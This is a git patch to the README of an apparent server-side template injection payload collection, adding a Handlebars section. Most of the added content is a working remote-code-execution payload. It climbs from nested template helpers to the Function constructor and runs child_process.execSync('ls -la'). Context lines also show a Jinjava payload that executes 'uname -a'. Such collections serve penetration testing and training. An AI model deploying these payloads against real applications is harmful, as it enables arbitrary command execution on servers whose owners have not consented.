From 76e6f7dc95784a2aaaf6c22dacb065887fe037dd Mon Sep 17 00:00:00 2001 From: Techbrunch Date: Wed, 19 Aug 2020 14:20:18 +0200 Subject: [PATCH] Update README.md Add Handlebars payload --- Server Side Template Injection/README.md | 34 +++++++++++++++++++++++- 1 file changed, 33 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 2f88b82..2d63970 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -44,6 +44,7 @@ * [Jinjava](#jinjava) * [Basic injection](#basic-injection) * [Command execution](#command-execution) +* [Handlebars](#handlebars) * [ASP.NET Razor](#aspnet-razor) * [Basic injection](#basic-injection) * [Command execution](#command-execution) @@ -476,6 +477,37 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} ``` +## Handlebars + +### Command Execution + +```handlebars +{{#with "s" as |string|}} + {{#with "e"}} + {{#with split as |conslist|}} + {{this.pop}} + {{this.push (lookup string.sub "constructor")}} + {{this.pop}} + {{#with string.split as |codelist|}} + {{this.pop}} + {{this.push "return require('child_process').execSync('ls -la');"}} + {{this.pop}} + {{#each conslist}} + {{#with (string.sub.apply 0 codelist)}} + {{this}} + {{/with}} + {{/each}} + {{/with}} + {{/with}} + {{/with}} +{{/with}} +``` + +### References + +- [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) +- [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) + ## ASP.NET Razor ### Basic injection @@ -510,4 +542,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) * [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection) * [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE) -* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) \ No newline at end of file +* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)